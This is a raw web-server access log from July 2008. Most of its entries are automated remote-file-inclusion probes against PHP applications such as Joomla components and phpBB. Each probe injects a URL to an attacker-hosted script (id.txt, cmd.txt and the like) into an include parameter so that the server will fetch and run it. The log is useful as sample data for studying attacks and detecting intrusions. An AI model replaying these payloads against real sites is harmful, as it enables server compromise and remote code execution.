194.79.75.195 - - [29/Jul/2008:04:04:58 -0500] "GET //ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://rotihidup.com/components/com_rss/id??? HTTP/1.1" 404 320 "-""libwww-perl/5.810"
194.79.75.195 - - [29/Jul/2008:04:05:03 -0500] "GET /logs//ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://rotihidup.com/components/com_rss/id??? HTTP/1.1" 404 325 "-""libwww-perl/5.810"
194.79.75.195 - - [29/Jul/2008:04:05:03 -0500] "GET //ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://rotihidup.com/components/com_rss/id??? HTTP/1.1" 404 320 "-""libwww-perl/5.810"
72.3.138.50 - - [29/Jul/2008:04:05:28 -0500] "GET /logs/errors.php?error=http://mabat.edumining.info/oye.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.65"
72.3.138.50 - - [29/Jul/2008:04:05:28 -0500] "GET /errors.php?error=http://mabat.edumining.info/oye.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.65"
205.234.198.225 - - [29/Jul/2008:04:06:33 -0500] "GET /logs/errors.php?error=http://mabat.edumining.info/oye.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.810"
205.234.198.225 - - [29/Jul/2008:04:06:34 -0500] "GET /errors.php?error=http://mabat.edumining.info/oye.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.810"
216.81.239.15 - - [29/Jul/2008:04:08:16 -0500] "GET /logs/access_log.1214438400//sql.php?classes_dir=http://www.thecornerstone.net/calendar/languages/id.txt??? HTTP/1.1" 404 319 "-""libwww-perl/5.805"
216.81.239.15 - - [29/Jul/2008:04:08:16 -0500] "GET //sql.php?classes_dir=http://www.thecornerstone.net/calendar/languages/id.txt??? HTTP/1.1" 404 292 "-""libwww-perl/5.805"
216.81.239.15 - - [29/Jul/2008:04:08:17 -0500] "GET /logs//sql.php?classes_dir=http://www.thecornerstone.net/calendar/languages/id.txt??? HTTP/1.1" 404 297 "-""libwww-perl/5.805"
151.1.210.219 - - [29/Jul/2008:04:08:33 -0500] "GET /logs/access_log.1212883200/admin.php?INCLUDE_FOLDER=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 320 "-""libwww-perl/5.79"
151.1.210.219 - - [29/Jul/2008:04:08:33 -0500] "GET /admin.php?INCLUDE_FOLDER=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 293 "-""libwww-perl/5.79"
151.1.210.219 - - [29/Jul/2008:04:08:34 -0500] "GET /logs/admin.php?INCLUDE_FOLDER=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 298 "-""libwww-perl/5.79"
151.1.210.219 - - [29/Jul/2008:04:08:39 -0500] "GET /logs/access_log.1212883200/join.php?INCLUDE_FOLDER=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 319 "-""libwww-perl/5.79"
151.1.210.219 - - [29/Jul/2008:04:08:40 -0500] "GET /join.php?INCLUDE_FOLDER=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 292 "-""libwww-perl/5.79"
151.1.210.219 - - [29/Jul/2008:04:08:40 -0500] "GET /logs/join.php?INCLUDE_FOLDER=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 297 "-""libwww-perl/5.79"
216.81.239.15 - - [29/Jul/2008:04:08:55 -0500] "GET /logs/access_log.1214438400//adodbt/sql.php?classes_dir=http://www.thecornerstone.net/calendar/languages/id.txt??? HTTP/1.1" 404 326 "-""libwww-perl/5.805"
216.81.239.15 - - [29/Jul/2008:04:08:55 -0500] "GET //adodbt/sql.php?classes_dir=http://www.thecornerstone.net/calendar/languages/id.txt??? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
216.81.239.15 - - [29/Jul/2008:04:08:55 -0500] "GET /logs//adodbt/sql.php?classes_dir=http://www.thecornerstone.net/calendar/languages/id.txt??? HTTP/1.1" 404 304 "-""libwww-perl/5.805"
151.1.210.219 - - [29/Jul/2008:04:09:34 -0500] "GET /logs/access_log.1212883200/shop.php?INCLUDE_FOLDER=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 319 "-""libwww-perl/5.79"
151.1.210.219 - - [29/Jul/2008:04:09:35 -0500] "GET /shop.php?INCLUDE_FOLDER=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 292 "-""libwww-perl/5.79"
151.1.210.219 - - [29/Jul/2008:04:09:35 -0500] "GET /logs/shop.php?INCLUDE_FOLDER=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 297 "-""libwww-perl/5.79"
151.1.210.219 - - [29/Jul/2008:04:09:41 -0500] "GET /logs/access_log.1212883200/shop/index.php?INCLUDE_FOLDER=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 325 "-""libwww-perl/5.79"
151.1.210.219 - - [29/Jul/2008:04:09:42 -0500] "GET /shop/index.php?INCLUDE_FOLDER=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 298 "-""libwww-perl/5.79"
151.1.210.219 - - [29/Jul/2008:04:09:42 -0500] "GET /logs/shop/index.php?INCLUDE_FOLDER=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 303 "-""libwww-perl/5.79"
193.207.106.54 - - [29/Jul/2008:04:10:19 -0500] "GET /logs//index.php?DOCUMENT_ROOT=http://mabat.edumining.info/oye.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.79"
193.207.106.54 - - [29/Jul/2008:04:10:19 -0500] "GET //index.php?DOCUMENT_ROOT=http://mabat.edumining.info/oye.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.79"
151.1.210.219 - - [29/Jul/2008:04:10:30 -0500] "GET /logs/access_log.1212883200/forum/vacans/339/join.php?INCLUDE_FOLDER=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 336 "-""libwww-perl/5.79"
151.1.210.219 - - [29/Jul/2008:04:10:31 -0500] "GET /forum/vacans/339/join.php?INCLUDE_FOLDER=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 309 "-""libwww-perl/5.79"
151.1.210.219 - - [29/Jul/2008:04:10:31 -0500] "GET /logs/forum/vacans/339/join.php?INCLUDE_FOLDER=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 314 "-""libwww-perl/5.79"
151.1.210.219 - - [29/Jul/2008:04:11:02 -0500] "GET /logs/access_log.1212883200/kpk/index.php?INCLUDE_FOLDER=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 324 "-""libwww-perl/5.79"
151.1.210.219 - - [29/Jul/2008:04:11:02 -0500] "GET /kpk/index.php?INCLUDE_FOLDER=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 297 "-""libwww-perl/5.79"
151.1.210.219 - - [29/Jul/2008:04:11:03 -0500] "GET /logs/kpk/index.php?INCLUDE_FOLDER=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 302 "-""libwww-perl/5.79"
151.1.210.219 - - [29/Jul/2008:04:12:11 -0500] "GET /logs/access_log.1212883200/errors.php?error=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 321 "-""libwww-perl/5.79"
151.1.210.219 - - [29/Jul/2008:04:12:12 -0500] "GET /errors.php?error=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 294 "-""libwww-perl/5.79"
151.1.210.219 - - [29/Jul/2008:04:12:12 -0500] "GET /logs/errors.php?error=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 299 "-""libwww-perl/5.79"
216.81.239.15 - - [29/Jul/2008:04:12:39 -0500] "GET /logs/access_log.1213142400//sql.php?classes_dir=http://www.thecornerstone.net/calendar/languages/id.txt??? HTTP/1.1" 404 319 "-""libwww-perl/5.805"
216.81.239.15 - - [29/Jul/2008:04:12:52 -0500] "GET /logs/access_log.1213142400//adodbt/sql.php?classes_dir=http://www.thecornerstone.net/calendar/languages/id.txt??? HTTP/1.1" 404 326 "-""libwww-perl/5.805"
151.1.210.219 - - [29/Jul/2008:04:12:59 -0500] "GET /logs/access_log.1212883200/errors.php?error=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 321 "-""libwww-perl/5.79"
151.1.210.219 - - [29/Jul/2008:04:12:59 -0500] "GET /errors.php?error=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 294 "-""libwww-perl/5.79"
151.1.210.219 - - [29/Jul/2008:04:13:00 -0500] "GET /logs/errors.php?error=http://www.cafelecaire.com/gallery/data/mraneti.txt??? HTTP/1.1" 404 299 "-""libwww-perl/5.79"
82.215.5.179 - - [29/Jul/2008:04:14:31 -0500] "GET /logs/access_log.1214438400//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.icamotorediciones.es/administrator/includes/pcl/id.txt??? HTTP/1.1" 404 321 "-""libwww-perl/5.79"
82.215.5.179 - - [29/Jul/2008:04:14:32 -0500] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.icamotorediciones.es/administrator/includes/pcl/id.txt??? HTTP/1.1" 404 294 "-""libwww-perl/5.79"
82.215.5.179 - - [29/Jul/2008:04:14:36 -0500] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.icamotorediciones.es/administrator/includes/pcl/id.txt??? HTTP/1.1" 404 299 "-""libwww-perl/5.79"
193.207.106.54 - - [29/Jul/2008:04:15:15 -0500] "GET /errors.php?error=http://mabat.edumining.info/oye.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.79"
193.207.106.54 - - [29/Jul/2008:04:15:15 -0500] "GET /logs/errors.php?error=http://mabat.edumining.info/oye.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.79"
207.44.234.103 - - [29/Jul/2008:04:17:51 -0500] "GET /errors.php?error=http://madebymantila.yoll.net/id.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.811"
207.44.234.103 - - [29/Jul/2008:04:17:51 -0500] "GET /logs/errors.php?error=http://madebymantila.yoll.net/id.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.811"
85.214.120.115 - - [29/Jul/2008:04:20:44 -0500] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://madebymantila.yoll.net/id.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.69"
85.214.120.115 - - [29/Jul/2008:04:20:44 -0500] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://madebymantila.yoll.net/id.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.69"
85.214.120.115 - - [29/Jul/2008:04:21:51 -0500] "GET /logs/errors.php?error=http://madebymantila.yoll.net/id.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.69"
85.214.120.115 - - [29/Jul/2008:04:21:51 -0500] "GET /errors.php?error=http://madebymantila.yoll.net/id.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.69"
62.76.116.20 - - [29/Jul/2008:04:25:00 -0500] "GET /logs/administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://thefantasyclub.net/id.txt???? HTTP/1.1" 404 360 "-""libwww-perl/5.810"
62.76.116.20 - - [29/Jul/2008:04:25:00 -0500] "GET /administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://thefantasyclub.net/id.txt???? HTTP/1.1" 404 355 "-""libwww-perl/5.810"
62.76.116.20 - - [29/Jul/2008:04:25:00 -0500] "GET /logs/access_log.1214438400/administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://thefantasyclub.net/id.txt???? HTTP/1.1" 404 382 "-""libwww-perl/5.810"
62.76.116.20 - - [29/Jul/2008:04:25:50 -0500] "GET /logs/access_log.1212883200/administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://thefantasyclub.net/id.txt???? HTTP/1.1" 404 382 "-""libwww-perl/5.810"
213.33.84.163 - - [29/Jul/2008:04:27:24 -0500] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.boardal.com/lang/id2.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
213.33.84.163 - - [29/Jul/2008:04:27:24 -0500] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.boardal.com/lang/id2.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
64.22.89.194 - - [29/Jul/2008:04:27:26 -0500] "GET /logs/errors.php?error=http://madebymantila.yoll.net/id.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.812"
64.22.89.194 - - [29/Jul/2008:04:27:26 -0500] "GET /errors.php?error=http://madebymantila.yoll.net/id.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.812"
213.208.165.244 - - [29/Jul/2008:04:27:41 -0500] "GET /logs//include/admin.lib.inc.php?site_path=http://mtalawla.com//modules/My_eGallery/ids.txt???? HTTP/1.1" 404 315 "-""libwww-perl/5.803"
213.208.165.244 - - [29/Jul/2008:04:27:42 -0500] "GET //include/admin.lib.inc.php?site_path=http://mtalawla.com//modules/My_eGallery/ids.txt???? HTTP/1.1" 404 310 "-""libwww-perl/5.803"
213.208.165.244 - - [29/Jul/2008:04:27:45 -0500] "GET /logs//include/admin.lib.inc.php?site_path=http://mtalawla.com//modules/My_eGallery/ids.txt???? HTTP/1.1" 404 315 "-""libwww-perl/5.803"
213.208.165.244 - - [29/Jul/2008:04:27:48 -0500] "GET //include/admin.lib.inc.php?site_path=http://mtalawla.com//modules/My_eGallery/ids.txt???? HTTP/1.1" 404 310 "-""libwww-perl/5.803"
213.208.165.244 - - [29/Jul/2008:04:27:48 -0500] "GET /logs//include/admin.lib.inc.php?site_path=http://mtalawla.com//modules/My_eGallery/ids.txt???? HTTP/1.1" 404 315 "-""libwww-perl/5.803"
62.76.116.20 - - [29/Jul/2008:04:27:51 -0500] "GET /logs/access_log.1212883200%20/administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://thefantasyclub.net/id.txt???? HTTP/1.1" 404 383 "-""libwww-perl/5.810"
213.208.165.244 - - [29/Jul/2008:04:27:52 -0500] "GET //include/admin.lib.inc.php?site_path=http://mtalawla.com//modules/My_eGallery/ids.txt???? HTTP/1.1" 404 310 "-""libwww-perl/5.803"
209.132.97.196 - - [29/Jul/2008:04:29:54 -0500] "GET /tattoo/tattoo1.htm HTTP/1.1" 200 3776 "-""WebRingChecker/1.71 LWP/5.79"
74.6.18.231 - - [29/Jul/2008:04:30:11 -0500] "GET /?N=A HTTP/1.0" 200 1231 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
89.108.66.182 - - [29/Jul/2008:04:31:00 -0500] "GET /logs//index.php?DOCUMENT_ROOT=http://bosanskinovi.info/components/com_zoom/lib/id?? HTTP/1.1" 404 299 "-""libwww-perl/5.812"
89.108.66.182 - - [29/Jul/2008:04:31:00 -0500] "GET //index.php?DOCUMENT_ROOT=http://bosanskinovi.info/components/com_zoom/lib/id?? HTTP/1.1" 404 294 "-""libwww-perl/5.812"
150.101.248.34 - - [29/Jul/2008:04:31:13 -0500] "GET //ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://www.kke.com/id.txt? HTTP/1.1" 404 320 "-""libwww-perl/5.79"
216.246.53.83 - - [29/Jul/2008:04:31:20 -0500] "GET /logs//authentication/phpbb2/phpbb2.functions.php?pConfig_auth[phpbb_path]=http://h1.ripway.com/maisspread/id.txt?? HTTP/1.1" 404 332 "-""libwww-perl/5.811"
216.246.53.83 - - [29/Jul/2008:04:31:21 -0500] "GET //authentication/phpbb2/phpbb2.functions.php?pConfig_auth[phpbb_path]=http://h1.ripway.com/maisspread/id.txt?? HTTP/1.1" 404 327 "-""libwww-perl/5.811"
216.246.53.83 - - [29/Jul/2008:04:31:36 -0500] "GET /logs//authentication/phpbb2/phpbb2.functions.php?pConfig_auth[phpbb_path]=http://h1.ripway.com/maisspread/id.txt?? HTTP/1.1" 404 332 "-""libwww-perl/5.811"
216.246.53.83 - - [29/Jul/2008:04:31:36 -0500] "GET //authentication/phpbb2/phpbb2.functions.php?pConfig_auth[phpbb_path]=http://h1.ripway.com/maisspread/id.txt?? HTTP/1.1" 404 327 "-""libwww-perl/5.811"
67.195.98.220 - - [29/Jul/2008:04:32:06 -0500] "GET / HTTP/1.0" 200 1231 "-""Mozilla/5.0 (compatible; Yahoo! DE Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
201.130.79.130 - - [29/Jul/2008:04:32:06 -0500] "GET /logs//include.php?path[docroot]=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 301 "-""libwww-perl/5.803"
201.130.79.130 - - [29/Jul/2008:04:32:06 -0500] "GET /logs//include.php?path[docroot]=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 301 "-""libwww-perl/5.803"
201.130.79.130 - - [29/Jul/2008:04:32:06 -0500] "GET //include.php?path[docroot]=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 296 "-""libwww-perl/5.803"
201.130.79.130 - - [29/Jul/2008:04:32:06 -0500] "GET //include.php?path[docroot]=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 296 "-""libwww-perl/5.803"
82.215.5.179 - - [29/Jul/2008:04:33:39 -0500] "GET /logs/access_log.1212883200//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.icamotorediciones.es/administrator/includes/pcl/id.txt??? HTTP/1.1" 404 321 "-""libwww-perl/5.79"
199.237.232.25 - - [29/Jul/2008:04:34:35 -0500] "GET /logs//authentication/phpbb2/phpbb2.functions.php?pConfig_auth%5Bphpbb_path%5D=http://h1.ripway.com/maisspread/id.txt?? HTTP/1.0" 404 320 "-""libwww-perl/5.50"
199.237.232.25 - - [29/Jul/2008:04:34:35 -0500] "GET //authentication/phpbb2/phpbb2.functions.php?pConfig_auth%5Bphpbb_path%5D=http://h1.ripway.com/maisspread/id.txt?? HTTP/1.0" 404 315 "-""libwww-perl/5.50"
199.237.232.25 - - [29/Jul/2008:04:35:05 -0500] "GET /logs//authentication/phpbb2/phpbb2.functions.php?pConfig_auth%5Bphpbb_path%5D=http://h1.ripway.com/maisspread/id.txt?? HTTP/1.0" 404 320 "-""libwww-perl/5.50"
199.237.232.25 - - [29/Jul/2008:04:35:05 -0500] "GET //authentication/phpbb2/phpbb2.functions.php?pConfig_auth%5Bphpbb_path%5D=http://h1.ripway.com/maisspread/id.txt?? HTTP/1.0" 404 315 "-""libwww-perl/5.50"
202.174.82.199 - - [29/Jul/2008:04:35:32 -0500] "GET /logs/?sourcedir=http://www.lethalwow.com/akon/ooid.txt?? HTTP/1.1" 200 93161 "-""libwww-perl/5.79"
202.174.82.199 - - [29/Jul/2008:04:35:32 -0500] "GET /logs/?sourcedir=http://www.lethalwow.com/akon/ooid.txt?? HTTP/1.1" 200 93161 "-""libwww-perl/5.79"
202.174.82.199 - - [29/Jul/2008:04:35:32 -0500] "GET /?sourcedir=http://www.lethalwow.com/akon/ooid.txt?? HTTP/1.1" 200 1243 "-""libwww-perl/5.79"
202.174.82.199 - - [29/Jul/2008:04:35:32 -0500] "GET /?sourcedir=http://www.lethalwow.com/akon/ooid.txt?? HTTP/1.1" 200 1243 "-""libwww-perl/5.79"
194.79.75.195 - - [29/Jul/2008:04:36:35 -0500] "GET /logs/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://rotihidup.com/components/com_rss/id??? HTTP/1.1" 404 349 "-""libwww-perl/5.810"
194.79.75.195 - - [29/Jul/2008:04:36:35 -0500] "GET /logs/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://rotihidup.com/components/com_rss/id??? HTTP/1.1" 404 349 "-""libwww-perl/5.810"
194.79.75.195 - - [29/Jul/2008:04:36:35 -0500] "GET /administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://rotihidup.com/components/com_rss/id??? HTTP/1.1" 404 344 "-""libwww-perl/5.810"
194.79.75.195 - - [29/Jul/2008:04:36:35 -0500] "GET /administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://rotihidup.com/components/com_rss/id??? HTTP/1.1" 404 344 "-""libwww-perl/5.810"
72.3.138.50 - - [29/Jul/2008:04:37:33 -0500] "GET //include/admin.lib.inc.php?site_path=http://mabat.edumining.info/oye.txt?? HTTP/1.1" 404 310 "-""libwww-perl/5.65"
72.3.138.50 - - [29/Jul/2008:04:37:33 -0500] "GET /logs//include/admin.lib.inc.php?site_path=http://mabat.edumining.info/oye.txt?? HTTP/1.1" 404 315 "-""libwww-perl/5.65"
69.64.48.146 - - [29/Jul/2008:04:37:39 -0500] "GET /logs//authentication/phpbb2/phpbb2.functions.php?pConfig_auth[phpbb_path]=http://h1.ripway.com/maisspread/id.txt?? HTTP/1.1" 404 332 "-""libwww-perl/5.79"
69.64.48.146 - - [29/Jul/2008:04:37:39 -0500] "GET /logs//authentication/phpbb2/phpbb2.functions.php?pConfig_auth[phpbb_path]=http://h1.ripway.com/maisspread/id.txt?? HTTP/1.1" 404 332 "-""libwww-perl/5.79"
69.64.48.146 - - [29/Jul/2008:04:37:39 -0500] "GET //authentication/phpbb2/phpbb2.functions.php?pConfig_auth[phpbb_path]=http://h1.ripway.com/maisspread/id.txt?? HTTP/1.1" 404 327 "-""libwww-perl/5.79"
69.64.48.146 - - [29/Jul/2008:04:37:39 -0500] "GET //authentication/phpbb2/phpbb2.functions.php?pConfig_auth[phpbb_path]=http://h1.ripway.com/maisspread/id.txt?? HTTP/1.1" 404 327 "-""libwww-perl/5.79"
194.79.75.195 - - [29/Jul/2008:04:38:17 -0500] "GET /administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://rotihidup.com/components/com_rss/id??? HTTP/1.1" 404 344 "-""libwww-perl/5.810"
204.187.101.25 - - [29/Jul/2008:04:38:50 -0500] "GET /administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://rotihidup.com/components/com_rss/id??? HTTP/1.1" 404 344 "-""libwww-perl/5.812"
209.97.201.148 - - [29/Jul/2008:04:39:49 -0500] "GET /logs//index.php?INCLUDE_ROOT=http://www.doxgroup.com/egroupware/did.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.79"
209.97.201.148 - - [29/Jul/2008:04:39:49 -0500] "GET //index.php?INCLUDE_ROOT=http://www.doxgroup.com/egroupware/did.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.79"
82.215.5.179 - - [29/Jul/2008:04:40:37 -0500] "GET /logs/?mosConfig_absolute_path=http://www.icamotorediciones.es/administrator/popups/id.txt? HTTP/1.1" 200 93161 "-""libwww-perl/5.79"
82.215.5.179 - - [29/Jul/2008:04:40:39 -0500] "GET /?mosConfig_absolute_path=http://www.icamotorediciones.es/administrator/popups/id.txt? HTTP/1.1" 200 1243 "-""libwww-perl/5.79"
89.108.90.121 - - [29/Jul/2008:04:40:55 -0500] "GET //index.php?DOCUMENT_ROOT=http://www.doxgroup.com/egroupware/did.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
77.79.246.241 - - [29/Jul/2008:04:44:48 -0500] "GET /logs/access_log.1212883200/index1.php?=http://www.brazebo.it/echo.txt?? HTTP/1.1" 404 321 "-""libwww-perl/5.808"
77.79.246.241 - - [29/Jul/2008:04:44:48 -0500] "GET /index1.php?=http://www.brazebo.it/echo.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.808"
77.79.246.241 - - [29/Jul/2008:04:44:48 -0500] "GET /logs/index1.php?=http://www.brazebo.it/echo.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.808"
89.97.229.104 - - [29/Jul/2008:04:45:17 -0500] "GET /logs/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://purearcade.com/id.txt? HTTP/1.1" 404 349 "-""libwww-perl/5.803"
89.97.229.104 - - [29/Jul/2008:04:45:17 -0500] "GET /administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://purearcade.com/id.txt? HTTP/1.1" 404 344 "-""libwww-perl/5.803"
193.207.106.54 - - [29/Jul/2008:04:45:50 -0500] "GET //include/admin.lib.inc.php?site_path=http://mabat.edumining.info/oye.txt?? HTTP/1.1" 404 310 "-""libwww-perl/5.79"
193.207.106.54 - - [29/Jul/2008:04:45:51 -0500] "GET /logs//include/admin.lib.inc.php?site_path=http://mabat.edumining.info/oye.txt?? HTTP/1.1" 404 315 "-""libwww-perl/5.79"
64.26.63.17 - - [29/Jul/2008:04:47:03 -0500] "GET /logs//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://paijoe.007gb.com/cmd.txt? HTTP/1.1" 404 299 "-""libwww-perl/5.803"
64.26.63.17 - - [29/Jul/2008:04:47:03 -0500] "GET //index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://paijoe.007gb.com/cmd.txt? HTTP/1.1" 404 294 "-""libwww-perl/5.803"
74.6.21.116 - - [29/Jul/2008:04:49:32 -0500] "GET /robots.txt HTTP/1.0" 404 282 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
74.6.76.45 - - [29/Jul/2008:04:49:33 -0500] "GET / HTTP/1.0" 200 1231 "-""Mozilla/5.0 (compatible; Yahoo! DE Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
204.15.10.22 - - [29/Jul/2008:04:53:59 -0500] "GET //index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://dantman.com/.../rid?&cmd? HTTP/1.1" 404 294 "-""Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)"
204.15.10.22 - - [29/Jul/2008:04:53:59 -0500] "GET /logs//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://dantman.com/.../rid?&cmd? HTTP/1.1" 404 299 "-""Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)"
24.169.225.169 - - [29/Jul/2008:04:56:03 -0500] "GET /?sourcedir=http://clubmusic.caucasus.net/id.txt?? HTTP/1.1" 200 1243 "-""libwww-perl/5.79"
24.169.225.169 - - [29/Jul/2008:04:56:03 -0500] "GET /logs/?sourcedir=http://clubmusic.caucasus.net/id.txt?? HTTP/1.1" 200 93161 "-""libwww-perl/5.79"
81.198.180.10 - - [29/Jul/2008:04:56:31 -0500] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://tsunamibot.t35.com/on.txt?? HTTP/1.1" 404 347 "-""libwww-perl/5.805"
81.198.180.10 - - [29/Jul/2008:04:56:32 -0500] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://tsunamibot.t35.com/on.txt?? HTTP/1.1" 404 342 "-""libwww-perl/5.805"
89.108.90.121 - - [29/Jul/2008:04:58:53 -0500] "GET /logs//include.php?path[docroot]=http://www.doxgroup.com/egroupware/did.txt?? HTTP/1.1" 404 301 "-""libwww-perl/5.805"
89.108.90.121 - - [29/Jul/2008:04:58:53 -0500] "GET //include.php?path[docroot]=http://www.doxgroup.com/egroupware/did.txt?? HTTP/1.1" 404 296 "-""libwww-perl/5.805"
207.210.115.114 - - [29/Jul/2008:04:59:11 -0500] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://tsunamibot.t35.com/on.txt?? HTTP/1.1" 404 347 "-""libwww-perl/5.812"
207.210.115.114 - - [29/Jul/2008:04:59:11 -0500] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://tsunamibot.t35.com/on.txt?? HTTP/1.1" 404 342 "-""libwww-perl/5.812"
82.215.5.179 - - [29/Jul/2008:04:59:49 -0500] "GET /logs/access_log.1213315200//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.icamotorediciones.es/administrator/includes/pcl/id.txt??? HTTP/1.1" 404 321 "-""libwww-perl/5.79"
82.215.5.179 - - [29/Jul/2008:04:59:51 -0500] "GET /logs/access_log.1213142400//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.icamotorediciones.es/administrator/includes/pcl/id.txt??? HTTP/1.1" 404 321 "-""libwww-perl/5.79"
77.79.246.241 - - [29/Jul/2008:05:01:07 -0500] "GET /logs/access_log.1213315200/index1.php?=http://www.brazebo.it/echo.txt?? HTTP/1.1" 404 321 "-""libwww-perl/5.808"
89.108.90.121 - - [29/Jul/2008:05:01:39 -0500] "GET //include.php?path[docroot]=http://www.doxgroup.com/egroupware/did.txt?? HTTP/1.1" 404 296 "-""libwww-perl/5.805"
89.108.90.121 - - [29/Jul/2008:05:01:39 -0500] "GET /logs//include.php?path[docroot]=http://www.doxgroup.com/egroupware/did.txt?? HTTP/1.1" 404 301 "-""libwww-perl/5.805"
